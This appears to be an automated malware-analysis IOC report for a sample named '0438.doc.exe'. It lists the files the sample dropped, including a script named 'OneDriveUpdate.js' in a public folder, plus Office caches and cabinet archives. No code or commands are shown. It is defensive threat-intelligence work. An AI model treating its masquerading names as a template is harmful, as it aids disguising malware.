Automated Malware Analysis IOC Report for

Files

File Path

Type

Category

Malicious

0438.doc.exe

PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows

initial sample

C:\Users\Public\Libraries\OneDriveUpdate.js

ASCII text, with very long lines (650), with no line terminators

dropped

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

Microsoft Cabinet archive data, Windows 2000/XP setup, 4770 bytes, 1 file, at 0x2c +A "disallowedcert.stl", number 1, 1 datablock, 0x1 compression

dropped

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

data

dropped

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\0438.doc.exe.log

CSV text

dropped

C:\Users\user\AppData\Local\Microsoft\FontCache\4\Catalog\ListAll.Json

JSON data

dropped

C:\Users\user\AppData\Local\Microsoft\FontCache\4\PreviewFont\flat_officeFontsPreview_4_39.ttf

dropped

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres

data

dropped

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\56a61aeb75d8f5be186c26607f4bb213abe7c5ec.tbres

data

dropped

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{3DAF4031-FAA4-467A-B5BA-86AB8F5A5627}.tmp

data

dropped

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

data

dropped

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

data

dropped

C:\Users\user\AppData\Local\Temp\Diagnostics\WINWORD\App1714044350303296500_7F3411FF-EA93-47A3-83A4-B5DC5FA1628B.log

data

dropped

C:\Users\user\AppData\Local\Temp\Diagnostics\WINWORD\App1714044350303722000_7F3411FF-EA93-47A3-83A4-B5DC5FA1628B.log

data

dropped

C:\Users\user\AppData\Local\Temp\TCD43EC.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCD43EC.tmp\iso690nmerical.xsl

XML 1.0 document, ASCII text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCD43FF.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCD43FF.tmp\chicago.xsl

XML 1.0 document, ASCII text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCD4416.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCD4416.tmp\ieee2006officeonline.xsl

XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCD4428.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCD4428.tmp\pictureorgchart.glox

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCD4438.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCD4438.tmp\gostname.xsl

XML 1.0 document, ASCII text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCD446C.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCD446C.tmp\ThemePictureAlternatingAccent.glox

Zip archive data, at least v2.0 to extract, compression method=deflate

dropped

C:\Users\user\AppData\Local\Temp\TCD446D.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCD446D.tmp\turabian.xsl

XML 1.0 document, ASCII text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCD447E.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCD447E.tmp\PictureFrame.glox

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCD448F.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCD448F.tmp\TabbedArc.glox

Zip archive data, at least v2.0 to extract, compression method=deflate

dropped

C:\Users\user\AppData\Local\Temp\TCD44B0.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCD44B0.tmp\TabList.glox

Zip archive data, at least v2.0 to extract, compression method=deflate

dropped

C:\Users\user\AppData\Local\Temp\TCD44D1.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCD44D1.tmp\InterconnectedBlockProcess.glox

Zip archive data, at least v2.0 to extract, compression method=deflate

dropped

C:\Users\user\AppData\Local\Temp\TCD44E2.tmp\APASixthEditionOfficeOnline.xsl

XML 1.0 document, ASCII text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCD44E2.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCD44E3.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCD44E3.tmp\harvardanglia2008officeonline.xsl

XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCD44E4.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCD44E4.tmp\ConvergingText.glox

Zip archive data, at least v2.0 to extract, compression method=deflate

dropped

C:\Users\user\AppData\Local\Temp\TCD44E5.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCD44E5.tmp\sist02.xsl

XML 1.0 document, ASCII text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCD44F5.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCD44F5.tmp\rings.glox

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCD4506.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCD4506.tmp\VaryingWidthList.glox

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCD4507.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCD4507.tmp\Equations.dotx

Microsoft Word 2007+

dropped

C:\Users\user\AppData\Local\Temp\TCD453B.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCD453B.tmp\RadialPictureList.glox

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCD453C.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCD453C.tmp\Element design set.dotx

Microsoft Word 2007+

dropped

C:\Users\user\AppData\Local\Temp\TCD455C.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCD455C.tmp\Text Sidebar (Annual Report Red and Black design).docx

Microsoft Word 2007+

dropped

C:\Users\user\AppData\Local\Temp\TCD458E.tmp\BracketList.glox

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCD458E.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCD459F.tmp\Banded.thmx

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCD459F.tmp\content.inf

Unicode text, UTF-16, little-endian text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCD45AF.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCD45AF.tmp\architecture.glox

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCD45C0.tmp\Basis.thmx

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCD45C0.tmp\content.inf

Unicode text, UTF-16, little-endian text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCD45F0.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCD45F0.tmp\HexagonRadial.glox

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCD4600.tmp\CircleProcess.glox

Zip archive data, at least v2.0 to extract, compression method=deflate

dropped

C:\Users\user\AppData\Local\Temp\TCD4600.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCD4611.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCD4611.tmp\chevronaccent.glox

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCD4633.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCD4633.tmp\ThemePictureAccent.glox

Zip archive data, at least v2.0 to extract, compression method=deflate

dropped

C:\Users\user\AppData\Local\Temp\TCD4653.tmp\Frame.thmx

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCD4653.tmp\content.inf

Unicode text, UTF-16, little-endian text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCD4664.tmp\Dividend.thmx

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCD4664.tmp\content.inf

Unicode text, UTF-16, little-endian text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCD4695.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCD4695.tmp\ThemePictureGrid.glox

Zip archive data, at least v2.0 to extract, compression method=deflate

dropped

C:\Users\user\AppData\Local\Temp\TCD46D6.tmp\Metropolitan.thmx

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCD46D6.tmp\content.inf

Unicode text, UTF-16, little-endian text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCD46D7.tmp\View.thmx

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCD46D7.tmp\content.inf

Unicode text, UTF-16, little-endian text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCD46E8.tmp\Wood_Type.thmx

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCD46E8.tmp\content.inf

Unicode text, UTF-16, little-endian text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCD4718.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCD4718.tmp\gb.xsl

XML 1.0 document, ASCII text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCD4729.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCD4729.tmp\iso690.xsl

XML 1.0 document, ASCII text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCD476A.tmp\Quotable.thmx

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCD476A.tmp\content.inf

Unicode text, UTF-16, little-endian text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCD477C.tmp\Parallax.thmx

Zip archive data, at least v2.0 to extract, compression method=deflate

dropped

C:\Users\user\AppData\Local\Temp\TCD477C.tmp\content.inf

Unicode text, UTF-16, little-endian text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCD479C.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCD479C.tmp\gosttitle.xsl

XML 1.0 document, ASCII text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCD479D.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCD479D.tmp\mlaseventheditionofficeonline.xsl

XML 1.0 document, ASCII text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCD47BD.tmp\Parcel.thmx

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCD47BD.tmp\content.inf

Unicode text, UTF-16, little-endian text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCD48CB.tmp\Berlin.thmx

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCD48CB.tmp\content.inf

Unicode text, UTF-16, little-endian text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCD48FB.tmp\Savon.thmx

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCD48FB.tmp\content.inf

Unicode text, UTF-16, little-endian text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCD48FC.tmp\Circuit.thmx

Zip archive data, at least v2.0 to extract, compression method=deflate

dropped

C:\Users\user\AppData\Local\Temp\TCD48FC.tmp\content.inf

Unicode text, UTF-16, little-endian text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCD4A0B.tmp\Gallery.thmx

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCD4A0B.tmp\content.inf

Unicode text, UTF-16, little-endian text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCD4A1C.tmp\Droplet.thmx

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCD4A1C.tmp\content.inf

Unicode text, UTF-16, little-endian text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCD4A2D.tmp\Damask.thmx

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCD4A2D.tmp\content.inf

Unicode text, UTF-16, little-endian text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCD4A5C.tmp\Main_Event.thmx

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCD4A5C.tmp\content.inf

Unicode text, UTF-16, little-endian text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCD4ACB.tmp\Content.inf

data

dropped

C:\Users\user\AppData\Local\Temp\TCD4ACB.tmp\Insight design set.dotx

Microsoft Word 2007+

dropped

C:\Users\user\AppData\Local\Temp\TCD4BC7.tmp\Mesh.thmx

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCD4BC7.tmp\content.inf

Unicode text, UTF-16, little-endian text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCD4EF5.tmp\Slate.thmx

Microsoft OOXML

dropped

C:\Users\user\AppData\Local\Temp\TCD4EF5.tmp\content.inf

Unicode text, UTF-16, little-endian text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\TCD5020.tmp\Vapor_Trail.thmx

Microsoft OOXML

modified

C:\Users\user\AppData\Local\Temp\TCD5020.tmp\content.inf

Unicode text, UTF-16, little-endian text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3znami5e.4bc.psm1

ASCII text, with no line terminators

dropped

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tzbk2cpi.p1d.ps1

ASCII text, with no line terminators

dropped

C:\Users\user\AppData\Local\Temp\cab43B1.tmp

Microsoft Cabinet archive data, many, 15691 bytes, 2 files, at 0x4c "gb.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cab43B2.tmp

Microsoft Cabinet archive data, many, 17466 bytes, 2 files, at 0x4c "chicago.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 10 datablocks, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cab43B3.tmp

Microsoft Cabinet archive data, many, 14813 bytes, 2 files, at 0x4c "iso690nmerical.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 7 datablocks, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cab43B4.tmp

Microsoft Cabinet archive data, many, 16689 bytes, 2 files, at 0x4c "iso690.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cab43C5.tmp

Microsoft Cabinet archive data, many, 4091 bytes, 2 files, at 0x44 "BracketList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cab43D5.tmp

Microsoft Cabinet archive data, many, 6005 bytes, 2 files, at 0x44 "HexagonRadial.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cab43D6.tmp

Microsoft Cabinet archive data, many, 14939 bytes, 2 files, at 0x44 "CircleProcess.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cab43D7.tmp

Microsoft Cabinet archive data, many, 14864 bytes, 2 files, at 0x4c "mlaseventheditionofficeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cab43E8.tmp

Microsoft Cabinet archive data, many, 7453 bytes, 2 files, at 0x44 "pictureorgchart.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cab43E9.tmp

Microsoft Cabinet archive data, many, 18672 bytes, 2 files, at 0x4c "APASixthEditionOfficeOnline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 11 datablocks, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cab43EA.tmp

Microsoft Cabinet archive data, many, 3749 bytes, 2 files, at 0x44 "TabbedArc.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cab43EB.tmp

Microsoft Cabinet archive data, many, 4313 bytes, 2 files, at 0x44 "chevronaccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cab43ED.tmp

Microsoft Cabinet archive data, many, 4410 bytes, 2 files, at 0x44 "PictureFrame.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cab43EE.tmp

Microsoft Cabinet archive data, many, 4967 bytes, 2 files, at 0x44 "TabList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cab4400.tmp

Microsoft Cabinet archive data, many, 15461 bytes, 2 files, at 0x4c "gostname.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cab4401.tmp

Microsoft Cabinet archive data, many, 15327 bytes, 2 files, at 0x4c "sist02.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cab4402.tmp

Microsoft Cabinet archive data, many, 10800 bytes, 2 files, at 0x44 "ConvergingText.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cab4403.tmp

Microsoft Cabinet archive data, many, 12767 bytes, 2 files, at 0x4c "ieee2006officeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cab4404.tmp

Microsoft Cabinet archive data, many, 6450 bytes, 2 files, at 0x44 "ThemePictureAccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cab4405.tmp

Microsoft Cabinet archive data, many, 9170 bytes, 2 files, at 0x44 "InterconnectedBlockProcess.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cab4406.tmp

Microsoft Cabinet archive data, many, 15418 bytes, 2 files, at 0x4c "harvardanglia2008officeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cab4417.tmp

Microsoft Cabinet archive data, many, 15338 bytes, 2 files, at 0x4c "gosttitle.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cab4449.tmp

Microsoft Cabinet archive data, many, 19375 bytes, 2 files, at 0x4c "turabian.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 11 datablocks, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cab445A.tmp

Microsoft Cabinet archive data, many, 5731 bytes, 2 files, at 0x44 "ThemePictureAlternatingAccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cab445B.tmp

Microsoft Cabinet archive data, many, 6196 bytes, 2 files, at 0x44 "ThemePictureGrid.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cab445C.tmp

Microsoft Cabinet archive data, many, 27509 bytes, 2 files, at 0x4c "Equations.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cab449F.tmp

Microsoft Cabinet archive data, many, 5213 bytes, 2 files, at 0x44 "rings.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cab44B1.tmp

Microsoft Cabinet archive data, many, 3144 bytes, 2 files, at 0x44 "VaryingWidthList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cab4508.tmp

Microsoft Cabinet archive data, many, 26644 bytes, 2 files, at 0x4c "Element design set.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cab4509.tmp

Microsoft Cabinet archive data, many, 5647 bytes, 2 files, at 0x44 "RadialPictureList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cab451A.tmp

Microsoft Cabinet archive data, many, 30269 bytes, 2 files, at 0x4c "Text Sidebar (Annual Report Red and Black design).docx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cab452A.tmp

Microsoft Cabinet archive data, many, 291188 bytes, 2 files, at 0x44 +A "Banded.thmx" +A "content.inf", flags 0x4, ID 56338, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression

dropped

C:\Users\user\AppData\Local\Temp\cab456D.tmp

Microsoft Cabinet archive data, many, 279287 bytes, 2 files, at 0x44 +A "Basis.thmx" +A "content.inf", flags 0x4, ID 55632, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression

dropped

C:\Users\user\AppData\Local\Temp\cab456E.tmp

Microsoft Cabinet archive data, many, 5864 bytes, 2 files, at 0x44 "architecture.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cab4612.tmp

Microsoft Cabinet archive data, many, 259074 bytes, 2 files, at 0x44 +A "content.inf" +A "Dividend.thmx", flags 0x4, ID 58359, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression

dropped

C:\Users\user\AppData\Local\Temp\cab4623.tmp

Microsoft Cabinet archive data, many, 252241 bytes, 2 files, at 0x44 +A "content.inf" +A "Frame.thmx", flags 0x4, ID 34169, number 1, extra bytes 20 in head, 16 datablocks, 0x1503 compression

dropped

C:\Users\user\AppData\Local\Temp\cab4694.tmp

Microsoft Cabinet archive data, many, 243642 bytes, 2 files, at 0x44 +A "content.inf" +A "Metropolitan.thmx", flags 0x4, ID 19054, number 1, extra bytes 20 in head, 24 datablocks, 0x1503 compression

dropped

C:\Users\user\AppData\Local\Temp\cab4696.tmp

Microsoft Cabinet archive data, many, 704319 bytes, 2 files, at 0x44 +A "content.inf" +A "Wood_Type.thmx", flags 0x4, ID 5778, number 1, extra bytes 20 in head, 51 datablocks, 0x1503 compression

dropped

C:\Users\user\AppData\Local\Temp\cab4697.tmp

Microsoft Cabinet archive data, many, 206792 bytes, 2 files, at 0x44 +A "content.inf" +A "View.thmx", flags 0x4, ID 33885, number 1, extra bytes 20 in head, 15 datablocks, 0x1503 compression

dropped

C:\Users\user\AppData\Local\Temp\cab4739.tmp

Microsoft Cabinet archive data, many, 624532 bytes, 2 files, at 0x44 +A "content.inf" +A "Quotable.thmx", flags 0x4, ID 13510, number 1, extra bytes 20 in head, 30 datablocks, 0x1503 compression

dropped

C:\Users\user\AppData\Local\Temp\cab474A.tmp

Microsoft Cabinet archive data, many, 533290 bytes, 2 files, at 0x44 +A "content.inf" +A "Parallax.thmx", flags 0x4, ID 64081, number 1, extra bytes 20 in head, 29 datablocks, 0x1503 compression

dropped

C:\Users\user\AppData\Local\Temp\cab476B.tmp

Microsoft Cabinet archive data, many, 214772 bytes, 2 files, at 0x44 +A "content.inf" +A "Parcel.thmx", flags 0x4, ID 26500, number 1, extra bytes 20 in head, 19 datablocks, 0x1503 compression

dropped

C:\Users\user\AppData\Local\Temp\cab4899.tmp

Microsoft Cabinet archive data, many, 682092 bytes, 2 files, at 0x44 +A "Berlin.thmx" +A "content.inf", flags 0x4, ID 46672, number 1, extra bytes 20 in head, 30 datablocks, 0x1503 compression

dropped

C:\Users\user\AppData\Local\Temp\cab48AA.tmp

Microsoft Cabinet archive data, many, 1081343 bytes, 2 files, at 0x44 +A "Circuit.thmx" +A "content.inf", flags 0x4, ID 11309, number 1, extra bytes 20 in head, 45 datablocks, 0x1503 compression

dropped

C:\Users\user\AppData\Local\Temp\cab48BA.tmp

Microsoft Cabinet archive data, many, 1049713 bytes, 2 files, at 0x44 +A "content.inf" +A "Savon.thmx", flags 0x4, ID 60609, number 1, extra bytes 20 in head, 37 datablocks, 0x1503 compression

dropped

C:\Users\user\AppData\Local\Temp\cab494B.tmp

Microsoft Cabinet archive data, many, 937309 bytes, 2 files, at 0x44 +A "content.inf" +A "Gallery.thmx", flags 0x4, ID 44349, number 1, extra bytes 20 in head, 34 datablocks, 0x1503 compression

dropped

C:\Users\user\AppData\Local\Temp\cab499A.tmp

Microsoft Cabinet archive data, many, 1291243 bytes, 2 files, at 0x44 +A "content.inf" +A "Droplet.thmx", flags 0x4, ID 47417, number 1, extra bytes 20 in head, 54 datablocks, 0x1503 compression

dropped

C:\Users\user\AppData\Local\Temp\cab49AB.tmp

Microsoft Cabinet archive data, many, 1865728 bytes, 2 files, at 0x44 +A "content.inf" +A "Damask.thmx", flags 0x4, ID 63852, number 1, extra bytes 20 in head, 68 datablocks, 0x1503 compression

dropped

C:\Users\user\AppData\Local\Temp\cab49BB.tmp

Microsoft Cabinet archive data, many, 2511552 bytes, 2 files, at 0x44 +A "content.inf" +A "Main_Event.thmx", flags 0x4, ID 59889, number 1, extra bytes 20 in head, 90 datablocks, 0x1503 compression

dropped

C:\Users\user\AppData\Local\Temp\cab49EB.tmp

Microsoft Cabinet archive data, many, 3400898 bytes, 2 files, at 0x4c "Insight design set.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 106 datablocks, 0x1203 compression

dropped

C:\Users\user\AppData\Local\Temp\cab4B39.tmp

Microsoft Cabinet archive data, many, 2573508 bytes, 2 files, at 0x44 +A "content.inf" +A "Mesh.thmx", flags 0x4, ID 62129, number 1, extra bytes 20 in head, 94 datablocks, 0x1503 compression

dropped

C:\Users\user\AppData\Local\Temp\cab4E97.tmp

Microsoft Cabinet archive data, many, 1750009 bytes, 2 files, at 0x44 +A "content.inf" +A "Slate.thmx", flags 0x4, ID 28969, number 1, extra bytes 20 in head, 72 datablocks, 0x1503 compression

dropped

C:\Users\user\AppData\Local\Temp\cab4F54.tmp

Microsoft Cabinet archive data, many, 3239239 bytes, 2 files, at 0x44 +A "content.inf" +A "Vapor_Trail.thmx", flags 0x4, ID 19811, number 1, extra bytes 20 in head, 111 datablocks, 0x1503 compression

dropped

C:\Users\user\AppData\Local\Temp\~DF1C2FC5ED892EF161.TMP

data

dropped

C:\Users\user\AppData\Roaming\Microsoft\Office\MSO3072.acl

data

dropped

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\05.2022 ??????? ??????????-????.??????.LNK

MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Apr 25 10:25:48 2024, mtime=Thu Apr 25 10:25:51 2024, atime=Thu Apr 25 10:25:48 2024, length=44544, window=hide

dropped

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

Generic INItialization configuration [folders]

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03090430[[fn=Banded]].thmx (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03090434[[fn=Wood Type]].thmx (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457444[[fn=Basis]].thmx (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457464[[fn=Dividend]].thmx (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457475[[fn=Frame]].thmx (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457485[[fn=Mesh]].thmx (copy)

Microsoft OOXML

dropped

